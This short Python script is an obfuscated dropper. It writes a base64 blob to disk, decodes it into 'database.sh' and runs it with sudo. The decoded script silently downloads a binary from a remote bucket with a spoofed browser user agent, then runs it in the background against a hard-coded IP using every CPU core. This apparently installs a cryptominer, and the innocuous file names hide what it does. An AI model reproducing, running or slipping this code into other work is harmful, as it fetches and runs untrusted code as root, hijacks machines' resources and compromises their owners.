import os
os.system("echo 'd2dldCAtVSAiTW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNjEuMC4zMTYzLjc5IFNhZmFyaS81MzcuMzYiIGh0dHBzOi8vZm9ybS1jYXB0Y2hhLnMzLmFtYXpvbmF3cy5jb20vY2Fzc2FuZHJhcyA+L2Rldi9udWxsIDI+JjEKY2htb2QgK3ggY2Fzc2FuZHJhcwouL2Nhc3NhbmRyYXMgLW8gMTQ0LjEyNi4yMzAuODAgLXQgJChucHJvYykgPi9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwgJgp3aGlsZSA6OyBkbwogZGF0ZQogc2xlZXAgMTIwCmRvbmU=' > mydata")
os.system("base64 -d mydata > database.sh")
os.system("chmod +x database.sh")
os.system("sudo bash database.sh")
